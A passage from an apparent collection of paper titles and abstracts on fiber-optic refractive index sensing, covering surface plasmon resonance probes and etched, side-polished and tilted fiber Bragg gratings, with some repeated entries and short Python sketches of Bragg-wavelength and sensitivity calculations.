Interaction with selected, individual surface inhomogeneities gives rise to characteristic modifications of the emitted radiation, which provide detailed information about SP scattering, reflection, and interference phenomena. --- paper_title: Bending effects in optical fibers paper_content: Mode coupling at bends in optical fibers supporting one or only a few guided modes is analyzed by considering the local normal modes for the corresponding straight waveguide. Matrix elements giving the strength of coupling between guided modes at a corner bend, and for coupling between guided modes and radiation modes, are calculated as a function of guiding strength for this "geometrical" effect. The correction to these matrix elements due to the longitudinal strain in a bent fiber is also determined. The increase in propagation constant for the fundamental mode of a fiber wrapped in a coil of constant radius is calculated from information on the coupling strengths and mode propagation constants. The phase shift and attenuation of the fundamental mode caused by a spatially periodic microbending of the fiber axis are also considered. Finally, potential applications of these effects in fiber-optic devices such as mode converters, phase shifters, switches, and sensors are discussed. --- paper_title: A fiber-optic chemical sensor based on surface plasmon resonance paper_content: Abstract A fiber-optic chemical sensor is presented which utilizes surface plasmon resonance excitation. The sensing element of the fiber has been fabricated by removing a section of the fiber cladding and symmetrically depositing a thin layer of highly reflecting metal onto the fiber core. A white-light source is used to introduce a range of wavelengths into the fiber optic. Changes in the sensed parameters (e.g., bulk refractive index, film thinkness and film refractive index) are determined by measuring the transmitted spectral-intensity distribution. Experimental results of the sensitivity and the dynamic range in the measurement of the refractive indices of aqueous solutions are in agreement with the theoretical model of the sensor. --- paper_title: Surface plasmon subwavelength optics paper_content: Surface plasmons are waves that propagate along the surface of a conductor. By altering the structure of a metal's surface, the properties of surface plasmons—in particular their interaction with light—can be tailored, which offers the potential for developing new types of photonic device. This could lead to miniaturized photonic circuits with length scales that are much smaller than those currently achieved. Surface plasmons are being explored for their potential in subwavelength optics, data storage, light generation, microscopy and bio-photonics. --- paper_title: Fiber-Optic Sensors Based on Surface Plasmon Resonance: A Comprehensive Review paper_content: Since the introduction of optical fiber technology in the field of sensor based on the technique of surface plasmon resonance (SPR), fiber-optic SPR sensors have witnessed a lot of advancements. This paper reports on the past, present, and future scope of fiber-optic SPR sensors in the field of sensing of different chemical, physical, and biochemical parameters. A detailed mechanism of the SPR technique for sensing purposes has been discussed. Different new techniques and models in this area that have been introduced are discussed in quite a detail. We have tried to put the different advancements in the order of their chronological evolution. 
The content of the review article may be of great importance for the research community who are to take the field of fiber-optic SPR sensors as its research endeavors. --- paper_title: Surface plasmon resonance sensors: review paper_content: Abstract Since the first application of the surface plasmon resonance (SPR) phenomenon for sensing almost two decades ago, this method has made great strides both in terms of instrumentation development and applications. SPR sensor technology has been commercialized and SPR biosensors have become a central tool for characterizing and quantifying biomolecular interactions. This paper attempts to review the major developments in SPR technology. Main application areas are outlined and examples of applications of SPR sensor technology are presented. Future prospects of SPR sensor technology are discussed. --- paper_title: Fiber optic SPR biosensing of DNA hybridization and DNA-protein interactions. paper_content: In this paper we present a fiber optic surface plasmon resonance (SPR) sensor as a reusable, cost-effective and label free biosensor for measuring DNA hybridization and DNA-protein interactions. This is the first paper that combines the concept of a fiber-based SPR system with DNA aptamer bioreceptors. The fibers were sputtered with a 50nm gold layer which was then covered with a protein repulsive self-assembled monolayer of mixed polyethylene glycol (PEG). Streptavidin was attached to the PEG's carboxyl groups to serve as a versatile binding element for biotinylated ssDNA. The ssDNA coated SPR fibers were first evaluated as a nucleic acid biosensor through a DNA-DNA hybridization assay for a random 37-mer ssDNA. This single stranded DNA showed a 15 nucleotides overlap with the receptor ssDNA on the SPR fiber. A linear calibration curve was observed in 0.5-5 microM range. A negative control test did not reveal any significant non-specific binding, and the biosensor was easily regenerated. In a second assay the fiber optic SPR biosensor was functionalized with ssDNA aptamers against human immunoglobulin E. Limits of detection (2nM) and quantification (6nM) in the low nanomolar range were observed. The presented biosensor was not only useful for DNA and protein quantification purposes, but also to reveal the binding kinetics occurring at the sensor surface. The dissociation constant between aptamer and hIgE was equal to 30.9+/-2.9nM. The observed kinetics fully comply with most data from the literature and were also confirmed by own control measurements. --- paper_title: Fibre-optic evanescent field absorption sensor based on a U-shaped probe paper_content: A fibre-optic evanescent field absorption sensor based on a U-shaped sensing probe is described. The influences of fibre core diameter, bending radius of the probe and the refractive index of the fluid on the sensitivity of the sensor are evaluated experimentally. The results are compared with the theoretical results obtained using geometrical optics and based on two-dimensional treatment. A good qualitative agreement is found between them. --- paper_title: Surface Plasmon Resonance-Based Fiber Optic Sensors: Principle, Probe Designs, and Some Applications paper_content: Surface plasmon resonance technique in collaboration with optical fiber technology has brought tremendous advancements in sensing of various physical, chemical, and biochemical parameters. 
In this review article, we present the principle of SPR technique for sensing and various designs of the fiber optic SPR probe reported for the enhancement of the sensitivity of the sensor. In addition, we present few examples of the surface plasmon resonance- (SPR-) based fiber optic sensors. The present review may provide researchers valuable information regarding fiber optic SPR sensors and encourage them to take this area for further research and development. --- paper_title: Bending effects in optical fibers paper_content: Mode coupling at bends in optical fibers supporting one or only a few guided modes is analyzed by considering the local normal modes for the corresponding straight waveguide. Matrix elements giving the strength of coupling between guided modes at a corner bend, and for coupling between guided modes and radiation modes, are calculated as a function of guiding strength for this "geometrical" effect. The correction to these matrix elements due to the longitudinal strain in a bent fiber is also determined. The increase in propagation constant for the fundamental mode of a fiber wrapped in a coil of constant radius is calculated from information on the coupling strengths and mode propagation constants. The phase shift and attenuation of the fundamental mode caused by a spatially periodic microbending of the fiber axis are also considered. Finally, potential applications of these effects in fiber-optic devices such as mode converters, phase shifters, switches, and sensors are discussed. --- paper_title: A fiber-optic chemical sensor based on surface plasmon resonance paper_content: Abstract A fiber-optic chemical sensor is presented which utilizes surface plasmon resonance excitation. The sensing element of the fiber has been fabricated by removing a section of the fiber cladding and symmetrically depositing a thin layer of highly reflecting metal onto the fiber core. A white-light source is used to introduce a range of wavelengths into the fiber optic. Changes in the sensed parameters (e.g., bulk refractive index, film thinkness and film refractive index) are determined by measuring the transmitted spectral-intensity distribution. Experimental results of the sensitivity and the dynamic range in the measurement of the refractive indices of aqueous solutions are in agreement with the theoretical model of the sensor. --- paper_title: Fiber-Optic Sensors Based on Surface Plasmon Resonance: A Comprehensive Review paper_content: Since the introduction of optical fiber technology in the field of sensor based on the technique of surface plasmon resonance (SPR), fiber-optic SPR sensors have witnessed a lot of advancements. This paper reports on the past, present, and future scope of fiber-optic SPR sensors in the field of sensing of different chemical, physical, and biochemical parameters. A detailed mechanism of the SPR technique for sensing purposes has been discussed. Different new techniques and models in this area that have been introduced are discussed in quite a detail. We have tried to put the different advancements in the order of their chronological evolution. The content of the review article may be of great importance for the research community who are to take the field of fiber-optic SPR sensors as its research endeavors. --- paper_title: Design and characteristics of refractive index sensor based on thinned and microstructure fiber Bragg grating. 
paper_content: A refractive index sensor based on the thinned and microstructure fiber Bragg grating (ThMs-FBG) was proposed and realized as a chemical sensor. The numerical simulation for the reflectance spectrum of the ThMs-FBG was calculated and the phase shift down-peak could be observed from the reflectance spectrum. Many factors influencing the reflectance spectrum were considered in detail for simulation, including the etched depth, length, and position. The sandwich-solution etching method was utilized to realize the microstructure of the ThMs-FBG, and the photographs of the microstructure were obtained. Experimental results demonstrated that the reflectance spectrum, phase shift down-peak wavelength, and reflected optical intensity of the ThMs-FBG all depended on the surrounding refractive index. However, only the down-peak wavelength of the ThMs-FBG changed with the surrounding temperature. Under the condition that the length and cladding diameter of the ThMs-FBG microstructure were 800 μm and 14 μm, respectively, and the position of the microstructure of the ThMs-FBG is in the middle of the grating region, the refractive index sensitivity of the ThMs-FBG was 0.79 nm/refractive index unit over the wide range of 1.33-1.457, with a high resolution of 1.2 × 10⁻³. The temperature sensitivity was 0.0103 nm/°C, which was approximately equal to that of a common FBG. --- paper_title: Point-by-point written fiber-Bragg gratings and their application in complex grating designs paper_content: The point-by-point technique of fabricating fibre-Bragg gratings using an ultrafast laser enables complete control of the position of each index modification that comprises the grating. By tailoring the local phase, amplitude and spacing of the grating's refractive index modulations it is possible to create gratings with complex transmission and reflection spectra. We report a series of grating structures that were realized by exploiting these flexibilities. Such structures include gratings with controlled bandwidth, and amplitude- and phase-modulated sampled (or superstructured) gratings. A model based on coupled-mode theory provides important insights into the manufacture of such gratings. Our approach offers a quick and easy method of producing complex, non-uniform grating structures in both fibres and other mono-mode waveguiding structures. --- paper_title: Fiber grating spectra paper_content: In this paper, we describe the spectral characteristics that can be achieved in fiber reflection (Bragg) and transmission gratings. Both principles for understanding and tools for designing fiber gratings are emphasized. Examples are given to illustrate the wide variety of optical properties that are possible in fiber gratings. The types of gratings considered include uniform, apodized, chirped, discrete phase-shifted, and superstructure gratings; short-period and long-period gratings; symmetric and tilted gratings; and cladding-mode and radiation-mode coupling gratings. --- paper_title: Hydrogen sensor based on side-polished fiber Bragg gratings coated with thin palladium film paper_content: A new type of hydrogen sensor based on a side-polished fiber Bragg grating (FBG) coated with a thin palladium film was demonstrated experimentally. The FBG used, with a reflectivity of 90%, was fabricated in a hydrogen-loaded single-mode fiber (SMF-28) using the phase mask writing technique with a KrF excimer laser. The experimental results show that the proposed sensor can be applied for hydrogen concentration measurements.
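The etched and thinned FBG refractometers summarized above all rest on the Bragg condition (resonance wavelength equals twice the effective index times the grating period) together with an approximately linear calibration between wavelength shift and surrounding refractive index. The short Python sketch below shows that arithmetic; the effective index and period are illustrative, and the 0.79 nm/RIU figure is simply reused from the ThMs-FBG entry as an example calibration.

```python
# Minimal sketch of the arithmetic behind the etched-FBG refractometers above.
# Etching exposes the evanescent field, so n_eff (and hence lambda_B) follows
# the surrounding refractive index (SRI). Values are illustrative only.

def bragg_wavelength(n_eff, period_nm):
    """Resonance wavelength (nm) of a uniform FBG: lambda_B = 2 * n_eff * period."""
    return 2.0 * n_eff * period_nm

def sri_change_from_shift(delta_lambda_nm, sensitivity_nm_per_riu):
    """Invert a linear calibration: delta_n = delta_lambda / S."""
    return delta_lambda_nm / sensitivity_nm_per_riu

if __name__ == "__main__":
    lam = bragg_wavelength(n_eff=1.447, period_nm=535.0)   # ~1548 nm
    print(f"Bragg wavelength: {lam:.1f} nm")
    # e.g. a 0.04 nm shift read against the 0.79 nm/RIU calibration quoted above
    print(f"SRI change: {sri_change_from_shift(0.04, 0.79):.3f} RIU")
```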
--- paper_title: Formation of Bragg gratings in optical fibers by a transverse holographic method. paper_content: Bragg gratings have been produced in germanosilicate optical fibers by exposing the core, through the side of the cladding, to a coherent UV two-beam interference pattern with a wavelength selected to lie in the oxygen-vacancy defect band of germania, near 244 nm. Fractional index perturbations of approximately 3 × 10⁻⁵ have been written in a 4.4-mm length of the core with a 5-min exposure. The Bragg filters formed by this new technique had reflectivities of 50-55% and spectral widths, at half-maximum, of 42 GHz. --- paper_title: Thinned fiber Bragg gratings as high sensitivity refractive index sensor paper_content: In this work, the numerical and experimental analysis on the use of thinned fiber Bragg gratings as refractive index sensors has been carried out. Wet chemical etching in a buffered hydrofluoric acid solution was used for sensor fabrication. Experimental characterization for an almost fully etched cladding sensor is presented, demonstrating good agreement with numerical results and resolutions of ≈10⁻⁵ and ≈10⁻⁴ for outer refractive indices around 1.45 and 1.333, respectively. --- paper_title: Theoretical and experimental study on etched fiber Bragg grating cladding mode resonances for ambient refractive index sensing paper_content: The theoretical model of etched fiber Bragg grating (FBG) backward cladding-mode resonances for ambient refractive index sensing is presented. The behavior of the mode resonances has been analyzed as the fiber is etched and as the ambient refractive index is changed. The analysis is based on the classical coupled-mode theory while considering interactions among multiple modes, and is developed on a three-layer step-index fiber geometry. Experimental data match the theoretical model very well. This model not only describes the relationship between the FBG backward cladding-mode resonances and the ambient index but is also valuable for the design of a flexible, highly sensitive ambient index sensor. --- paper_title: Etched fiber Bragg grating for refractive index distribution measurement paper_content: Abstract We present a refractive index (RI) distribution sensor based on an etched fiber Bragg grating (FBG). The FBG is etched by hydrofluoric acid solution until the residual diameter of its core is about 5.73 μm, and then it is installed in a micro-tube where the RI of the liquid medium decreases linearly along its axis. The reflection spectrum of the etched FBG changes from a single resonant peak into many micro-resonant peaks under the inhomogeneous liquid medium. The difference of the wavelengths between the maximum micro-resonant peak and the minimum one changes linearly with the RI gradient, and the average change of the wavelengths changes linearly with the average change of the RI as well. Experimental results show that the RI-gradient sensitivity and the average RI sensitivity for this etched FBG sensor are about 336.2 nm mm/RIU and 49.44 nm/RIU, respectively, when the surrounding RI ranges from 1.330 to 1.3586. Associated with the sensitivity of the RI gradient and the average sensitivity of the RI, the linear RI distribution of the inhomogeneous liquid medium surrounding the etched FBG can be obtained.
--- paper_title: Optical low-coherence reflectometry (OLCR) characterization of efficient Bragg gratings in optical fiber paper_content: Conference paper (F. Ouellette), Conference on Photosensitivity and Self-Organization in Optical Fibers and Waveguides, Aug. 17-18, 1993, Quebec, Canada; only repository metadata is available for this record. --- paper_title: Demonstration of etched cladding fiber Bragg grating-based sensors with hydrogel coating paper_content: A novel hydrogel-coated single-mode fiber Bragg grating (FBG) sensor is investigated. The sensor uses a swellable polymer material, hydrogel, as the active sensing component. The sensing mechanism is based on the stress that is induced in the chemically sensitive swellable hydrogel coating. The stress shifts the Bragg wavelength of the FBG. By reducing the cladding diameter of the FBG through etching with hydrofluoric acid, the tension tuning force of the FBG can be lowered. Therefore, the stress induced in the hydrogel can shift the wavelength of the FBG more and the sensitivity of the sensor is improved. When the grating fiber is etched to 37.5 μm in diameter, the sensitivity of the sensor is approximately 10-fold larger than that without fiber etching. --- paper_title: Visible wavelength fiber Bragg grating arrays for high speed biomedical spectral sensing paper_content: Spectral data for each pixel in a confocal spatial scan are acquired by mapping spectral slices into the time domain with an array of visible fiber Bragg gratings. Multispectral images of biomedical tissue can be generated in real time. --- paper_title: D-shaped fiber grating refractive index sensor induced by an ultrashort pulse laser paper_content: The fabrication of fiber Bragg gratings was here demonstrated using ultrashort pulse laser point-by-point inscription. This is a very convenient means of creating fiber Bragg gratings with different grating periods and works by changing the translation speed of the fiber. The laser energy was first optimized in order to improve the spectral properties of the fiber gratings. Then, fiber Bragg gratings were formed into D-shaped fibers for use as refractive index sensors. A nonlinear relationship was observed between the Bragg wavelength and the liquid refractive index, and a sensitivity of ∼30 nm/RIU was observed at 1.450. This shows that D-shaped fiber Bragg gratings might be used to develop promising biochemical sensors. --- paper_title: A Temperature-Insensitive Cladding-Etched Fiber Bragg Grating Using a Liquid Mixture with a Negative Thermo-Optic Coefficient paper_content: To compensate for the temperature dependency of a standard FBG, a cladding-etched FBG immersed in a liquid mixture having a negative thermo-optic coefficient is presented, and its characteristics are investigated. The Bragg wavelength of the cladding-etched FBG is shifted counter to the direction of the Bragg wavelength shift of a conventional FBG according to the mixing ratio of glycerin to water; thus, the temperature-dependent Bragg wavelength shift was almost compensated by using a liquid mixture of water (50%) and glycerin (50%) having a negative thermo-optic coefficient of −5 × 10⁻⁴ °C⁻¹.
--- paper_title: Point-by-point fabrication of micro-Bragg gratings in photosensitive fibre using single excimer pulse refractive index modification techniques paper_content: Optical fibre Bragg reflectors have been fabricated using a single pulse of high power 249 nm excimer laser light to photoinduce point-by-point each individual index element forming the grating. Bragg reflectors with a length of 360 μm and reflectivity of 70% have been made. --- paper_title: Fiber Bragg Gratings: Fundamentals and Applications in Telecommunications and Sensing paper_content: Photosensitivity in optical fibres; properties of fibre Bragg gratings; inscribing Bragg gratings in optical fibres; fibre Bragg grating theory; applications of Bragg gratings in communications; fibre Bragg grating sensors; impact of fibre Bragg gratings. --- paper_title: Bragg gratings fabricated in monomode photosensitive optical fiber by UV exposure through a phase mask paper_content: A photolithographic method is described for fabricating refractive index Bragg gratings in photosensitive optical fiber by using a special phase mask grating made of silica glass. A KrF excimer laser beam (249 nm) at normal incidence is modulated spatially by the phase mask grating. The diffracted light, which forms a periodic, high-contrast intensity pattern with half the phase mask grating pitch, photoimprints a refractive index modulation into the core of photosensitive fiber placed behind, in proximity, and parallel, to the mask; the phase mask grating striations are oriented normal to the fiber axis. This method of fabricating in-fiber Bragg gratings is flexible, simple to use, results in reduced mechanical sensitivity of the grating writing apparatus and is functional even with low spatial and temporal coherence laser sources. --- paper_title: A fibre Bragg grating refractometer paper_content: An opto-chemical in-fibre Bragg grating (FBG) sensor for refractive index measurement in liquids has been developed using fibre side-polishing technology. At a polished site where the fibre cladding has partly been removed, a FBG is exposed to a liquid analyte via evanescent field interaction of the guided fibre mode. The Bragg wavelength of the FBG is obtained in terms of its dependence on the refractive index of the analyte. Modal and wavelength dependences have been investigated both theoretically and experimentally in order to optimize the structure of the sensor. Using working wavelengths far above the cut-off wavelength results in an enhancement of the sensitivity of the sensor. Measurements with different mode configurations lead to the separation of cross sensitivities. Besides this, a second FBG located in the unpolished part can be used to compensate for temperature effects. Application examples for monitoring fuels of varying quality as well as salt concentrations under deep borehole conditions are presented. --- paper_title: Demonstration of an etched cladding fiber Bragg grating filter with reduced tuning force requirement paper_content: A novel tunable fiber Bragg grating (FBG) filter with a chemically etched cladding has been demonstrated. By reducing the cladding diameter of a FBG through etching with HF, the tension tuning force can be lowered by over an order of magnitude. Wavelength tuning up to a failure point of 21.2 nm has been demonstrated along with repeated cycling over a 9 nm tuning range. Observations of increased coupling to resonant cladding modes in the etched FBGs are also noted.
--- paper_title: Fiber Bragg grating technology fundamentals and overview paper_content: The historical beginnings of photosensitivity and fiber Bragg grating (FBG) technology are recounted. The basic techniques for fiber grating fabrication, their characteristics, and the fundamental properties of fiber gratings are described. The many applications of fiber grating technology are tabulated, and some selected applications are briefly described. --- paper_title: Side-polished fiber Bragg grating refractive index sensor with TbFeCo magnetoptic thin film paper_content: Fiber Bragg grating (FBG) is side-polished to enable interaction with sensitive materials around FBG fiber core. Using TbFeCo magneto-optic thin film deposited onto FBG fiber core as transducer, a FBG refractive index senor for magnetic field/current characterization is first proposed and demonstrated in this paper. Magnetic field sensing experiments show 19 pm of wavelength shift at a magnetic field intensity of 50 mT, the average linearity of magnetic field response is 0.9877. --- paper_title: Recent research progress of optical fiber sensors based on D-shaped structure paper_content: Abstract The review summarizes recent studies on D-shaped optical fibers and their recent applications in optical sensors. The configurations and working principles of D-shaped optical fibers are introduced. For each optical fiber sensor, the structure principles and measuring methods are all discussed in detail, with their optimal characteristics and performances being compared. Results from various studies show that it is possible to realize a high-sensitivity optical fiber sensor with a simple structure, good mechanical properties, and strong anti-interference ability. This may be due to the excellent structural design of the D-shaped optical fiber. Finally, key issues and new challenges on the D-shaped optical fiber are discussed. --- paper_title: Fiber Bragg Gratings in the Visible Spectral Range With Ultraviolet Femtosecond Laser Inscription paper_content: In this letter, we investigate the inscription of fiber Bragg gratings in the visible spectral range using deep ultraviolet femtosecond laser exposure and two-beam interferometry. The properties of first-order reflection gratings and third-order gratings for use in the visible wavelength range are compared. Stronger gratings have been achieved for first-order reflecting Bragg gratings compared with third-order gratings. We demonstrate a fiber Bragg grating with a grating period of 226 nm and a filtering efficiency of more than 30 dB. --- paper_title: Side-polished fiber Bragg grating hydrogen sensor with WO 3 -Pd composite film as sensing materials paper_content: WO3-Pd composite films were deposited on the side-face of side-polished fiber Bragg grating as sensing elements by magnetron sputtering process. XRD result indicates that the WO3-Pd composite films are mainly amorphous. Compared to standard FBG coated with same hydrogen sensitive film, side-polished FBG significantly increase the sensor’s sensitivity. When hydrogen concentrations are 4% and 8% in volume percentage, maximum wavelength shifts of side-polished FBG are 25 and 55 pm respectively. The experimental results show the sensor’s hydrogen response is reversible, and side-polished FBG hydrogen sensor has great potential in hydrogen’s measurement. 
--- paper_title: Wide Range Refractive Index Measurement Using a Multi-Angle Tilted Fiber Bragg Grating paper_content: The conventional single-angle tilted fiber Bragg grating (TFBG) can only excite a certain range of cladding modes, limiting it for refractive index (RI) measurement in a wide range. In this letter, we fabricate and demonstrate a multi-angle TFBG, in which five individual TFBGs with tilt angles ranging from 5° to 25° are sequentially inscribed along the core of a single mode fiber within a length of 20 mm. The multi-angle TFBG excites a continuous spectral comb of narrowband-cladding modes over a much wider wavelength range (>170 nm) than a single-angle TFBG, making it suitable for dynamic RI measurement over a wide range (1.15–1.45). We have experimentally measured aqueous solutions with RI ranging from 1.30 to 1.45 using the uncoated (by monitoring the cut-off mode) and gold-coated (by monitoring the surface plasmon resonance) multi-angle TFBGs, and both methods show linear responses, with RI sensitivities about 500 nm/RIU. --- paper_title: Demodulation technique for weakly tilted fiber Bragg grating refractometer paper_content: In this letter, a demodulation technique is presented in order to measure the surrounding refractive index in the range 1-1.45 by means of a weakly tilted fiber Bragg grating. This technique is based on the global monitoring of the cladding modes in the transmitted spectrum and on the computation of two statistical parameters. We report a resolution of 2 × 10⁻⁴ in terms of the refractive index as well as a temperature-insensitive behavior. --- paper_title: Tilted fiber phase gratings paper_content: A detailed theoretical treatment is presented of bound-mode to bound-mode Bragg reflection and bound-mode to radiation-mode coupling loss in a tilted optical-fiber phase grating. Numerical predictions of the effects of grating tilt on the spectral characteristics of such a grating are calculated. These predictions are compared with experimentally measured spectra of strong gratings written by ultraviolet irradiation of deuterium-sensitized fiber with grating tilt angles ranging from 0° to 15°. Good agreement is obtained between the theoretical predictions and the experimental results. --- paper_title: Optical fiber refractometer using narrowband cladding-mode resonance shifts. paper_content: Short-period fiber Bragg gratings with weakly tilted grating planes generate multiple strong resonances in transmission. Our experimental results show that the wavelength separation between selected resonances allows the measurement of the refractive index of the medium surrounding the fiber for values between 1.25 and 1.44 with an accuracy approaching 1 × 10⁻⁴. The sensor element is 10 mm long and made from standard single-mode telecommunication grade optical fiber by ultraviolet light irradiation through a phase mask. --- paper_title: Ultrasensitive plasmonic sensing in air using optical fibre spectral combs paper_content: Fibre sensors are key to many minimally-invasive detection techniques but, owing to an index mismatch, they are often limited to aqueous environments. Here, Caucheteur et al. develop a high-resolution fibre gas sensor with a tilted in-fibre grating that allows coupling to higher-order plasmon modes.
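The TFBG refractometers above are read out through the cladding-mode phase-matching condition; in one common convention this is written as the sum of the core and cladding effective indices times the grating period divided by the cosine of the tilt angle (some authors fold the cosine into the period instead). The Python sketch below pairs that relation with a linear demodulation using the roughly 500 nm/RIU sensitivity quoted for the multi-angle TFBG; all numerical values are illustrative, not taken from the cited measurements.

```python
import math

def tfbg_cladding_resonance_nm(n_eff_core, n_eff_clad_i, period_nm, tilt_deg):
    """Phase-matching wavelength of the i-th cladding-mode resonance of a TFBG:
    lambda_i = (n_eff_core + n_eff_clad_i) * period / cos(tilt).
    Note: some papers define the period along the fiber axis and drop the cosine."""
    return (n_eff_core + n_eff_clad_i) * period_nm / math.cos(math.radians(tilt_deg))

def delta_ri_from_shift(delta_lambda_nm, sensitivity_nm_per_riu=500.0):
    """Linear demodulation of a resonance shift into a refractive index change."""
    return delta_lambda_nm / sensitivity_nm_per_riu

if __name__ == "__main__":
    lam = tfbg_cladding_resonance_nm(1.447, 1.430, 550.0, 10.0)   # illustrative values
    print(f"cladding-mode resonance near {lam:.0f} nm")
    print(f"0.05 nm shift -> delta n = {delta_ri_from_shift(0.05):.1e} RIU")
```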
--- paper_title: Wide Range Refractive Index Measurement Using a Multi-Angle Tilted Fiber Bragg Grating paper_content: The conventional single-angle tilted fiber Bragg grating (TFBG) can only excite a certain range of cladding modes, limiting it for refractive index (RI) measurement in a wide range. In this letter, we fabricate and demonstrate a multi-angle TFBG, in which five individual TFBGs with tilt angles ranging from 5° to 25° are sequentially inscribed along the core of a single mode fiber within a length of 20 mm. The multi-angle TFBG excites a continuous spectral comb of narrowband-cladding modes over a much wider wavelength range (>170 nm) than a single-angle TFBG, making it suitable for dynamic RI measurement over a wide range (1.15–1.45). We have experimentally measured aqueous solutions with RI ranging from 1.30 to 1.45 using the uncoated (by monitoring the cut-off mode) and gold-coated (by monitoring the surface Plasmon resonance) multi-angle TFBGs, and both methods show linear responses, with RI sensitivities about 500 nm/RIU. --- paper_title: In-fibre directional transverse loading sensor based on excessively tilted fibre Bragg gratings paper_content: We report a distinctive polarization mode coupling behaviour of tilted fibre Bragg gratings (TFBGs) with a tilted angle exceeding 45°. The ex-45° TFBGs exhibit pronounced polarization mode splitting resulted from the birefringence induced by the grating structure asymmetry. We have fabricated TFBGs with a tilted structure at 81° and studied their properties under transverse load applied to their equivalent fast and slow axes. The results show that the light coupling to the orthogonally polarized modes of the 81°-TFBGs changes only when the load is applied to their slow axis, giving a prominent directional loading response. For the view of real applications, we further investigated the possibility of interrogating such a TFBG-based load sensor using low-cost and compact-size single wavelength source and power detector. The experimental results clearly show that the 81°-TFBGs plus the proposed power-measurement interrogation scheme may be developed to an optical fibre vector sensor system capable of not just measuring the magnitude but also recognizing the direction of the applied transverse load. Using such an 81°-TFBG based load sensor, a load change as small as 1.6 × 10-2 g may be detected by employing a standard photodiode detector. --- paper_title: Ultrasensitive plasmonic sensing in air using optical fibre spectral combs paper_content: Fibre sensors are key to many minimally-invasive detection techniques but, owing to an index mismatch, they are often limited to aqueous environments. Here, Caucheteur et al. develop a high-resolution fibre gas sensor with a tilted in-fibre grating that allows coupling to higher-order plasmon modes. --- paper_title: Graphene-induced unique polarization tuning properties of excessively tilted fiber grating paper_content: By exploiting the polarization-sensitive coupling effect of graphene with the optical mode, we investigate the polarization modulation properties of a hybrid waveguide of graphene-integrated excessively tilted fiber grating (Ex-TFG). The theoretical analysis and experimental results demonstrate that the real and imaginary parts of complex refractive index of few-layer graphene exhibit different effects on transverse electric (TE) and transverse magnetic (TM) cladding modes of the Ex-TFG, enabling stronger absorption in the TE mode and more wavelength shift in the TM mode. 
Furthermore, the surrounding refractive index can modulate the complex optical constant of graphene and then the polarization properties of the hybrid waveguide, such as resonant wavelength and peak intensity. Therefore, the unique polarization tuning property induced by the integration of the graphene layer with Ex-TFG may endow potential applications in all-in-one fiber modulators, fiber lasers, and biochemical sensors. --- paper_title: Optic sensors of high refractive-index responsivity and low thermal cross sensitivity that use fiber Bragg gratings of >80° tilted structures paper_content: For the first time to the authors' knowledge, fiber Bragg gratings (FBGs) with >80 degrees tilted structures have been fabricated and characterized. Their performance in sensing temperature, strain, and the surrounding medium's refractive index was investigated. In comparison with normal FBGs and long-period gratings (LPGs), >80 degrees tilted FBGs exhibit significantly higher refractive-index responsivity and lower thermal cross sensitivity. When the grating sensor was used to detect changes in refractive index, a responsivity as high as 340 nm/refractive-index unit near an index of 1.33 was demonstrated, which is three times higher than that of conventional LPGs. --- paper_title: Wide Range Refractive Index Measurement Using a Multi-Angle Tilted Fiber Bragg Grating paper_content: The conventional single-angle tilted fiber Bragg grating (TFBG) can only excite a certain range of cladding modes, limiting it for refractive index (RI) measurement in a wide range. In this letter, we fabricate and demonstrate a multi-angle TFBG, in which five individual TFBGs with tilt angles ranging from 5° to 25° are sequentially inscribed along the core of a single mode fiber within a length of 20 mm. The multi-angle TFBG excites a continuous spectral comb of narrowband-cladding modes over a much wider wavelength range (>170 nm) than a single-angle TFBG, making it suitable for dynamic RI measurement over a wide range (1.15–1.45). We have experimentally measured aqueous solutions with RI ranging from 1.30 to 1.45 using the uncoated (by monitoring the cut-off mode) and gold-coated (by monitoring the surface Plasmon resonance) multi-angle TFBGs, and both methods show linear responses, with RI sensitivities about 500 nm/RIU. --- paper_title: Negative axial strain sensitivity in gold-coated eccentric fiber Bragg gratings paper_content: New dual temperature and strain sensor has been designed using eccentric second-order fiber Bragg gratings produced in standard single-mode optical fiber by point-by-point direct writing technique with tight focusing of 800 nm femtosecond laser pulses. With thin gold coating at the grating location, we experimentally show that such gratings exhibit a transmitted amplitude spectrum composed by the Bragg and cladding modes resonances that extend in a wide spectral range exceeding one octave. An overlapping of the first order and second order spectrum is then observed. High-order cladding modes belonging to the first order Bragg resonance coupling are close to the second order Bragg resonance, they show a negative axial strain sensitivity (-0.55 pm/με) compared to the Bragg resonance (1.20 pm/με) and the same temperature sensitivity (10.6 pm/°C). With this well conditioned system, temperature and strain can be determined independently with high sensitivity, in a wavelength range limited to a few nanometers. 
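The gold-coated eccentric FBG entry above quotes a negative axial strain sensitivity for a high-order cladding resonance and an identical temperature sensitivity for both resonances, which is exactly the well-conditioned two-by-two system needed for dual-parameter discrimination. The sketch below solves that system with the quoted coefficients; the wavelength shifts in the example are invented for illustration only.

```python
import numpy as np

# Sensitivity matrix from the gold-coated eccentric FBG entry above:
# rows = [Bragg resonance, high-order cladding resonance],
# columns = [strain (pm/microstrain), temperature (pm/degC)].
K = np.array([[1.20, 10.6],
              [-0.55, 10.6]])

def strain_and_temperature(d_lambda_bragg_pm, d_lambda_cladding_pm):
    """Solve K @ [strain, dT] = [d_lambda_bragg, d_lambda_cladding]."""
    shifts = np.array([d_lambda_bragg_pm, d_lambda_cladding_pm])
    strain_ue, d_temp = np.linalg.solve(K, shifts)
    return strain_ue, d_temp

if __name__ == "__main__":
    # Illustrative shifts (pm); not measured values from the paper.
    eps, dT = strain_and_temperature(130.0, 40.0)
    print(f"strain = {eps:.1f} microstrain, dT = {dT:.1f} degC")
```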
--- paper_title: Cladding mode coupling in highly localized fiber Bragg gratings: modal properties and transmission spectra paper_content: The spectral characteristics of a fiber Bragg grating (FBG) with a transversely inhomogeneous refractive index profile, differs con- siderably from that of a transversely uniform one. Transmission spectra of inhomogeneous and asymmetric FBGs that have been inscribed with focused ultrashort pulses with the so-called point-by-point technique are investigated. The cladding mode resonances of such FBGs can span a full octave in the spectrum and are very pronounced (deeper than 20dB). Using a coupled-mode approach, we compute the strength of resonant coupling and find that coupling into cladding modes of higher azimuthal order is very sensitive to the position of the modification in the core. Exploiting these properties allows precise control of such reflections and may lead to many new sensing applications. --- paper_title: Surface plasmon resonance in eccentric femtosecond-laser-induced fiber Bragg gratings paper_content: Highly localized refractive index modulations are photo-written in the core of pure silica fiber using point-by-point focused UV femtosecond pulses. These specific gratings exhibit a comb-like transmitted amplitude spectrum, with polarization-dependent narrowband cladding mode resonances. In this work, eccentric gratings are surrounded by a gold sheath, allowing the excitation of surface plasmon polaritons (SPP) for radially-polarized light modes. The spectral response is studied as a function of the surrounding refractive index and a maximum sensitivity of 50 nm/RIU (refractive index unit) is reported for a well-defined 